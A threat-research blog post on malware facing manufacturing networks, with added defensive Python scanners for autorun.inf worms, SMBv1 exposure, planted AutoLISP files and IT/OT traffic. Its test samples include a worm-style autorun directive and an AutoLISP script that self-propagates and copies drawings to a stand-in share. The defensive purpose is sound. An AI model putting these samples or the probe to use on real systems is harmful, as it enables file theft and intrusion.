by Matsukawa Bakuei, Ryan Flores, Vladimir Kropotov, and Fyodor Yarochkin (Threat Researchers)
The introduction of cyber-physical systems (CPSs) into manufacturing, the shift known as Industry 4.0 and typically embodied in so-called smart factories, is just one manifestation of how the industrial internet of things (IIoT) is improving processes, introducing efficiencies, and spurring innovation in established and emerging industries. Beyond transforming production by connecting factory systems with one another and with enterprise networks, this new connectivity obliges Industry 4.0 adopters to reevaluate their security strategies for the convergence of information technology (IT), operational technology (OT), and intellectual property (IP).
The industrial sector now operates in a new kind of space where physical and digital components intersect. But as more devices and systems in the manufacturing network are connected, the potential entry points for attackers multiply. In this post, we look at the top malware detections in manufacturing networks, based on data from the Trend Micro™ Smart Protection Network™ infrastructure, review the common security threats to the manufacturing industry, and discuss how its cybersecurity can be improved.
Attacks against IT networks
Figure 1. Detections of autorun.inf across industries, with manufacturing having the highest, based on data from the Trend Micro™ Smart Protection Network™ infrastructure for the period from July to December 2018
Manufacturing has the highest detections of autorun.inf across industries. Downad (aka Conficker) and other USB worms abuse autorun.inf: the worm drops a copy of itself on the removable drive along with an autorun.inf that instructs Windows AutoRun to execute that copy whenever the drive is plugged in. Microsoft has disabled AutoRun for non-optical removable media by default since Windows 7 and pushed the same change to older versions as an update in 2011, so these detections point to exactly the legacy, unpatched, or deliberately permissive hosts one tends to find on the plant floor. This is a cause for concern given the common practice in the industry of using USB drives to transfer information within and between the IT and OT networks. For instance, the infamous Stuxnet malware, which was designed to target a nuclear facility, propagated via removable USB media (although it relied on a vulnerability in how Windows parsed shortcut (.LNK) files rather than on AutoRun). Incidents such as Stuxnet show that attacks can be unwittingly facilitated by employees carrying infected external devices as well as deliberately carried out by actors with malicious objectives. And while attacks may be initiated in enterprise networks, the repercussions may extend to the control systems themselves.
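To make the autorun.inf abuse concrete, here is an added example (it is not code from the original post or from Trend Micro) that parses an autorun.inf the tolerant way Windows does and reports which entries would launch a program. The worm-style sample embedded in it is constructed for the illustration, not a real specimen, and the list of suspicious traits is the author's own heuristic.

```python
"""Flag autorun.inf files that would launch a program when a drive is mounted.

Added example (not from the original post or Trend Micro). Windows'
AutoRun parser is case-insensitive and ignores lines it does not
understand; USB worms exploit that by burying the one live directive
among junk.  This parser is equally tolerant so the junk does not
hide the directive from us either.
"""
import re

# Directives that run or open something when the device is mounted;
# action/label/icon only shape the AutoPlay dialog.
EXEC_KEYS = {"open", "shellexecute"}
SHELL_COMMAND_KEY = re.compile(r"^shell\\[^\\]+\\command$")

# Traits typical of worm payloads rather than vendor install media
# (author's heuristic, not an official signature).
SUSPICIOUS = [
    re.compile(r"\brundll32\b", re.I),
    re.compile(r"recycler|\$recycle\.bin|system volume information", re.I),
    re.compile(r"\.(vmx|dat|tmp|jpg|pdf)\b", re.I),  # executable behind a data extension
]


def parse_autorun(data) -> dict:
    """Return the [autorun] section as {lower-cased key: value}.

    Accepts bytes or str; binary garbage is decoded as latin-1 so it
    cannot break parsing.  Lines without '=' and keys that are not
    printable are skipped, and the first occurrence of a key wins,
    mirroring how Windows reads INI files.
    """
    text = data.decode("latin-1") if isinstance(data, bytes) else data
    entries = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if not in_autorun or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower()
        if key and key.isprintable():
            entries.setdefault(key, value.strip())
    return entries


def assess(entries: dict) -> list:
    """Findings for a parsed [autorun] section; an empty list means nothing is launched."""
    findings = []
    for key, value in entries.items():
        if key in EXEC_KEYS or SHELL_COMMAND_KEY.match(key):
            findings.append(f"{key} launches: {value}")
            for pat in SUSPICIOUS:
                if pat.search(value):
                    findings.append(f"  suspicious /{pat.pattern}/ in {key}")
    if findings and "action" in entries:
        # Worms set action= to mimic the built-in "Open folder to view files" choice.
        findings.append(f"  AutoPlay dialog text set to: {entries['action']}")
    return findings


# Constructed sample in the style of a USB worm (not a real file):
# a junk line and benign-looking entries surround one live directive.
WORM_SAMPLE = (
    b"[AutoRun]\r\n"
    b"\x01\x7f\xfe=\x00junk\r\n"
    b"Action=Open folder to view files\r\n"
    b"Icon=%SystemRoot%\\system32\\shell32.dll,4\r\n"
    b";a comment line, ignored by Windows\r\n"
    b"ShellExecute=RuNdLl32.EXE .\\RECYCLER\\S-1-5-21-0\\payload.vmx,run\r\n"
    b"UseAutoPlay=1\r\n"
)

# Constructed benign vendor media: only cosmetic entries.
BENIGN_SAMPLE = b"[autorun]\r\nlabel=Vendor Manual\r\nicon=manual.ico\r\n"


if __name__ == "__main__":
    for name, sample in (("worm", WORM_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, assess(parse_autorun(sample)) or "clean")
```

Run it over the autorun.inf of every drive that comes in through a kiosk or media-scanning station; a file whose only launch target is a vendor setup.exe still deserves a look, but one that runs rundll32 against a payload hidden in a fake RECYCLER folder is the pattern Downad and its relatives used.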
In an example of how corporate IT networks can be targeted to disrupt manufacturing, a recent ransomware attack against an aluminum manufacturer forced the company to revert to manual operations. But perhaps no ransomware in recent memory is more notorious than WannaCry, given its rapid spread and significant impact on corporate systems. The malware also affected industrial control systems (ICSs) by infecting the computers that ran industrial control software. WannaCry is particularly noteworthy because it spreads through a flaw in the Server Message Block version 1 (SMBv1) implementation in Microsoft Windows, without requiring any interaction from the user. Many industrial systems (human-machine interfaces, engineering workstations, historians) run Windows and use SMB for file sharing, and any that had not been patched were exploitable by EternalBlue, the exploit for the SMBv1 vulnerability in question, even though Microsoft had released the fix (MS17-010) two months before the outbreak. The lack of patching, a problem aggravated in OT environments where maintenance windows are rare and vendor approval is often required before a patch can be applied, created a favorable environment for propagation across networks.
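Since the vulnerability WannaCry exploited lives in SMBv1, the first question for any Windows host on the plant floor is whether it still accepts that protocol version. The following added example (not Trend Micro's tooling) builds an SMBv1 NEGOTIATE request that offers only the NT LM 0.12 dialect and classifies the reply. The server response it carries for offline use is constructed, and the header flag values and the capability constants in it are assumptions modelled on a typical Windows reply.

```python
"""Probe whether a host still accepts SMBv1, the protocol version
EternalBlue/WannaCry exploited.

Added example, not Trend Micro's tooling.  We offer the server only
the SMBv1 "NT LM 0.12" dialect.  A host with SMBv1 enabled answers
with an SMBv1 (0xFF 'SMB') NEGOTIATE response selecting dialect 0; a
host with SMBv1 disabled closes the connection instead, and an
SMB2-only stack would answer 0xFE 'SMB'.
"""
import socket
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
DIALECTS = [b"NT LM 0.12"]   # offer SMBv1 only, so any acceptance means SMBv1 is on


def smb1_header(command: int, status: int = 0) -> bytes:
    """32-byte SMBv1 header (little-endian throughout)."""
    return SMB1_MAGIC + struct.pack(
        "<BIBHH8sHHHHH",
        command, status,
        0x18,        # Flags: canonical pathnames, case-insensitive
        0xC853,      # Flags2: Unicode, NT status codes, extended security
        0,           # PIDHigh
        bytes(8),    # SecurityFeatures
        0, 0,        # Reserved, TID
        0xFEFF,      # PIDLow
        0, 0,        # UID, MID
    )


def build_negotiate(dialects=DIALECTS) -> bytes:
    """NEGOTIATE request inside a NetBIOS session-message frame."""
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)       # Dialect[] entries
    msg = smb1_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(data)) + data
    return b"\x00" + len(msg).to_bytes(3, "big") + msg             # type 0, 24-bit length


def parse_negotiate_response(msg: bytes, dialects=DIALECTS) -> dict:
    """Classify the SMB message that came back (NetBIOS frame already stripped)."""
    if msg.startswith(SMB2_MAGIC):
        return {"smb1": False, "reason": "server negotiated SMB2/3 only"}
    if not msg.startswith(SMB1_MAGIC) or len(msg) < 35:
        return {"smb1": False, "reason": "no SMBv1 response"}
    status = struct.unpack_from("<I", msg, 5)[0]
    word_count = msg[32]
    if status != 0 or word_count == 0:
        return {"smb1": False, "reason": f"negotiate failed, NT status 0x{status:08x}"}
    dialect_index = struct.unpack_from("<H", msg, 33)[0]
    if dialect_index == 0xFFFF or dialect_index >= len(dialects):
        return {"smb1": False, "reason": "server rejected every offered dialect"}
    result = {"smb1": True, "dialect": dialects[dialect_index].decode()}
    if word_count >= 17 and len(msg) >= 36:
        # NT LM 0.12 reply: SecurityMode bit 0x08 means signing is required.
        result["signing_required"] = bool(msg[35] & 0x08)
    return result


def probe(host: str, port: int = 445, timeout: float = 3.0) -> dict:
    """Run the probe over TCP (needs network access; not exercised offline)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_negotiate())
            frame = s.recv(4)
            if len(frame) < 4 or frame[0] != 0x00:
                return {"smb1": False, "reason": "connection closed: SMBv1 likely disabled"}
            length = int.from_bytes(frame[1:4], "big")
            msg = b""
            while len(msg) < length:
                chunk = s.recv(length - len(msg))
                if not chunk:
                    break
                msg += chunk
    except OSError as exc:
        return {"smb1": False, "reason": f"no answer: {exc}"}
    return parse_negotiate_response(msg)


def constructed_reply(dialect_index: int, security_mode: int = 0x03) -> bytes:
    """Constructed NEGOTIATE response (WordCount 17, as a Windows host sends for NT LM 0.12).

    Capability and size values are plausible placeholders; the security blob is omitted.
    """
    words = struct.pack("<HBHHIIII", dialect_index, security_mode,
                        50, 1, 16644, 65536, 0, 0x8000E3FD)   # MaxMpx, VCs, BufSize, RawSize, SessKey, Caps
    words += bytes(8) + struct.pack("<h", 0) + bytes([0])     # SystemTime, TimeZone, ChallengeLength
    return smb1_header(SMB_COM_NEGOTIATE) + bytes([17]) + words + struct.pack("<H", 0)


if __name__ == "__main__":
    print(parse_negotiate_response(constructed_reply(0)))
    print(parse_negotiate_response(constructed_reply(0xFFFF)))
```

A positive result only says the host still speaks the protocol EternalBlue abused; whether it is also missing the fix is a separate question. On OT hosts that cannot be patched, the practical mitigation is to disable SMBv1 on the host and block TCP 445 at the IT/OT boundary.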
Security of ICSs and IP assets
ICSs and industrial infrastructures are under constant threat from malicious actors seeking to compromise critical processes. Unfortunately, not all ICSs were built and designed for today's connectivity and threat environment. Hardware and protocols can be difficult to integrate securely, and security controls are often absent or retrofitted onto old manufacturing systems. In fact, we have found manufacturing machines exposed on the internet using the IoT search engine Shodan.
Figure 2. Exposed monitor for mixers and their temperature and speed numbers
Moreover, ICSs are by no means exempt from malware. In 2017, Trisis (also known as Triton) was uncovered as the first known malware to target safety instrumented systems (SISs), the layer that is supposed to bring a process to a safe state when something goes wrong. It targeted Schneider Electric's Triconex SIS controllers, which are widely used in the Middle East's energy industry. The intrusion notably caused the affected plant's safety system to trip and shut the process down.
A breach in a manufacturing network can also have consequences for proprietary information such as copyrights, patents, trademarks, and trade secrets. Computer-aided design (CAD) or document files that contain digital blueprints of products and technical records are attractive targets for threat actors.
Figure 3. Malicious CAD file detections across industries, based on data from the Trend Micro Smart Protection Network infrastructure for the period from October to December 2018
We have found that manufacturing has the highest number of detections of malicious CAD files across industries. Attackers can trojanize CAD projects by abusing the scripting capabilities of the popular AutoCAD software, principally AutoLISP and to a lesser extent Visual Basic for Applications (VBA). AutoCAD automatically loads files such as acad.lsp and acaddoc.lsp from its support search path, which by default includes the folder of the drawing being opened, so a malicious script dropped beside a legitimate DWG file runs as soon as the drawing is opened (later AutoCAD releases added a SECURELOAD setting and a trusted-path list that can prompt on or block such loads, but older installs and permissive configurations do not). Poorly secured files can be used for industrial espionage, leakage of design data to underground markets, and production of counterfeit products. Ultimately, breaches of IP can even shake customer and shareholder confidence.
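As an added example (not from the original post and not Trend Micro's scanner), the script below looks for auto-load AutoLISP files sitting in the same folder as drawings and greps them for calls that a per-drawing helper has no business making. The folder layout, the list of risky functions and the sample script are constructed for the illustration; the sample is not a real specimen.

```python
"""Find AutoLISP auto-load files planted beside drawings and flag the
ones that reach outside the CAD session.

Added example, not Trend Micro's scanner.  The folder layout and the
sample script are constructed for this illustration.
"""
import os
import re
import tempfile
from pathlib import Path

# Files AutoCAD loads without user action when a drawing in that
# folder is opened (acad*.lsp on startup / per document, plus their
# compiled .fas/.vlx forms and the menu companion .mnl).
AUTOLOAD_NAMES = {
    "acad.lsp", "acaddoc.lsp", "acad.fas", "acaddoc.fas",
    "acad.vlx", "acaddoc.vlx", "acad.mnl",
}
DRAWING_SUFFIXES = {".dwg", ".dxf", ".dwt"}

# Visual LISP calls that a per-drawing helper has no business making
# (author's selection, not an exhaustive list).
RISKY_CALLS = {
    "startapp":           "launches an external program",
    "vlax-create-object": "instantiates a COM object such as WScript.Shell",
    "vl-file-copy":       "copies files (self-propagation into other DWG folders)",
    "vl-file-delete":     "deletes files",
    "vl-registry-write":  "writes to the Windows registry",
    "vl-mkdir":           "creates directories",
}
STARTUP_HOOK = re.compile(r"\(\s*defun\s+s::startup\b", re.I)
SHELL_CMD = re.compile(r'\(\s*command\s+"[._]*shell"', re.I)


def find_autoload_files(root) -> list:
    """Auto-load candidates that sit in a folder which also holds drawings."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        lowered = [f.lower() for f in filenames]
        if any(Path(f).suffix in DRAWING_SUFFIXES for f in lowered):
            hits += [Path(dirpath) / f for f in filenames if f.lower() in AUTOLOAD_NAMES]
    return sorted(hits)


def analyze_lisp(text: str) -> list:
    """Findings for one AutoLISP source file; comments are stripped first."""
    code = re.sub(r";[^\n]*", "", text)
    findings = []
    for name, why in RISKY_CALLS.items():
        if re.search(r"\(\s*" + re.escape(name) + r"(?=[\s)])", code, re.I):
            findings.append(f"{name}: {why}")
    if STARTUP_HOOK.search(code):
        findings.append("s::startup: defines the hook AutoCAD runs right after loading")
    if SHELL_CMD.search(code):
        findings.append("command SHELL: runs an operating-system command line")
    return findings


def scan(root) -> dict:
    """Map each auto-load file under root to its findings."""
    report = {}
    for path in find_autoload_files(root):
        if path.suffix.lower() in {".fas", ".vlx"}:
            report[str(path)] = ["compiled auto-load file: not inspectable as text, treat as suspect"]
        else:
            report[str(path)] = analyze_lisp(path.read_text(encoding="latin-1"))
    return report


# Constructed sample in the style of CAD-stealing scripts (not a real
# file): copies itself next to the drawing and exfiltrates via COM.
SAMPLE_ACADDOC_LSP = r"""
;;; acaddoc.lsp - looks like a harmless per-drawing helper
(defun c:hello () (princ "\nhelper loaded") (princ))
(defun s::startup ()
  (setq dir (getvar "DWGPREFIX"))
  (vl-file-copy (findfile "acaddoc.lsp") (strcat dir "acaddoc.lsp"))
  (setq sh (vlax-create-object "WScript.Shell"))
  (vlax-invoke sh 'Run (strcat "cmd /c copy \"" dir "*.dwg\" \\\\drop\\share") 0 T)
  (princ))
(princ)
"""


def build_sample_tree() -> str:
    """Create a temporary project folder: one drawing, one LISP, one compiled file."""
    root = tempfile.mkdtemp(prefix="cad_scan_")
    (Path(root) / "pump_housing.DWG").write_bytes(b"AC1032")   # DWG version header only
    (Path(root) / "acaddoc.lsp").write_text(SAMPLE_ACADDOC_LSP)
    (Path(root) / "acad.fas").write_bytes(b"\r\n FAS4-FILE ; constructed stand-in\r\n")
    (Path(root) / "README.txt").write_text("not a drawing")
    return root


if __name__ == "__main__":
    for path, findings in scan(build_sample_tree()).items():
        print(path, "->", findings or "clean")
```

Corporate AutoCAD deployments often ship a legitimate acaddoc.lsp of their own, so pair this with a hash allowlist of the approved files and alert on anything else that appears next to drawings, especially on shares that receive DWGs from suppliers.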
Figure 4. Sites showing leaked CAD files pertaining to a popular smartphone
Securing manufacturing networks and connected production environments
Security in the era of Industry 4.0 is a collaborative effort spanning IT, OT, and IP. Manufacturers who take on the challenge of adopting Industry 4.0 should implement robust protections built to defend physical and digital assets against cyberthreats and cyberattacks. Without knowledge of the industry's current threat landscape, systems and infrastructures risk being left vulnerable to attack, shutdown, or IP leakage.
Here are some security measures manufacturing organizations can take:
- Audit new and existing equipment in the organization. IT administrators should work with operational engineers to inventory the devices on each network and understand what information passes between them. This is crucial for unifying IT, OT, and IP security, for day-to-day visibility, and for incident response in case of an attack.
- Educate employees on security protocols. As in IT environments, employees also pose a risk to OT network security. Inform all staff about social engineering tactics and risky information-sharing behaviors (such as carrying unvetted USB drives between networks) to prevent breaches caused by lack of security awareness or human error.
- Employ domain or subnetwork restrictions. Restrict which machines can talk to one another to provide isolation and control between corporate and production systems. Explicitly designate which computers in the IT network may access production machines, and over which protocols, so that everything else crossing the boundary can be blocked and logged.
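As an added example (not part of the original post), the following script turns the subnetwork-restriction recommendation into a checkable policy: IT and OT zones are defined as address ranges, a short allowlist names which IT hosts may reach which OT ports, a few Windows services are denied outright, and every inbound-to-OT flow record is judged against that. The zones, the allowlist and the flow records are constructed for the illustration; in practice they come from the asset inventory and from firewall or NetFlow exports.

```python
"""Audit flows crossing from IT into OT against an explicit allowlist.

Added example, not part of the original post.  Zones, allowlist and
the flow records are constructed for illustration; on a real network
they come from the asset inventory and from firewall or NetFlow logs.
"""
import ipaddress
from collections import namedtuple

Flow = namedtuple("Flow", "src dst dport proto")

ZONES = {
    "IT": ipaddress.ip_network("10.10.0.0/16"),
    "OT": ipaddress.ip_network("10.20.0.0/16"),
}

# (IT host, OT port) pairs that are allowed to cross the boundary (constructed).
ALLOW = {
    ("10.10.5.20", 502),    # engineering workstation -> PLCs, Modbus/TCP
    ("10.10.5.20", 44818),  # engineering workstation -> PLCs, EtherNet/IP
    ("10.10.7.10", 4840),   # historian collector -> OPC UA server
}
# Windows admin and file-sharing services: never from IT into OT, whoever asks.
DENY_PORTS = {445: "SMB", 139: "NetBIOS", 3389: "RDP", 23: "Telnet"}


def zone_of(ip: str) -> str:
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return "EXTERNAL"


def evaluate(flow: Flow):
    """Return None when the flow is acceptable, otherwise the reason it is not."""
    src_zone, dst_zone = zone_of(flow.src), zone_of(flow.dst)
    if dst_zone != "OT" or src_zone == "OT":
        return None   # not inbound to OT; intra-OT and OT-initiated flows are out of scope here
    if src_zone == "EXTERNAL":
        return f"external {flow.src} reached OT host {flow.dst}:{flow.dport}"
    if flow.dport in DENY_PORTS:
        return f"{DENY_PORTS[flow.dport]} from IT {flow.src} into OT {flow.dst} is never permitted"
    if (flow.src, flow.dport) not in ALLOW:
        return f"IT {flow.src} -> OT {flow.dst}:{flow.dport}/{flow.proto} is not on the allowlist"
    return None


def parse_flow(line: str) -> Flow:
    """Parse a key=value record such as 'src=10.10.5.20 dst=10.20.1.5 dport=502 proto=tcp'."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    return Flow(fields["src"], fields["dst"], int(fields["dport"]), fields["proto"])


def audit(lines) -> list:
    """(record, reason) for every record that violates the policy."""
    findings = []
    for line in lines:
        reason = evaluate(parse_flow(line))
        if reason:
            findings.append((line, reason))
    return findings


# Constructed flow records, one per line (not real traffic).
SAMPLE_FLOWS = [
    "src=10.10.5.20 dst=10.20.1.5 dport=502 proto=tcp",     # allowed
    "src=10.10.7.10 dst=10.20.2.9 dport=4840 proto=tcp",    # allowed
    "src=10.10.9.33 dst=10.20.1.5 dport=445 proto=tcp",     # SMB into OT
    "src=10.10.5.20 dst=10.20.1.5 dport=3389 proto=tcp",    # RDP, even from the allowed workstation
    "src=10.10.9.33 dst=10.20.1.5 dport=502 proto=tcp",     # Modbus from an unlisted desktop
    "src=10.20.1.5 dst=10.20.1.6 dport=502 proto=tcp",      # intra-OT, out of scope
    "src=203.0.113.7 dst=10.20.3.1 dport=102 proto=tcp",    # internet host hitting S7comm
]


if __name__ == "__main__":
    for record, reason in audit(SAMPLE_FLOWS):
        print(f"{reason}\n    {record}")
```

The deny list is checked before the allowlist on purpose: the engineering workstation that is allowed to program PLCs is still not allowed to RDP into them, and a single SMB connection from an ordinary desktop into the production network is the exact path WannaCry took. OT-initiated flows toward IT are skipped here for brevity; a real policy should constrain those too.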
Read our research paper, “Securing Smart Factories: Threats to Manufacturing Environments in the Era of Industry 4.0,” for a detailed look at the threat landscape of the manufacturing industry and our recommended security measures for manufacturing environments.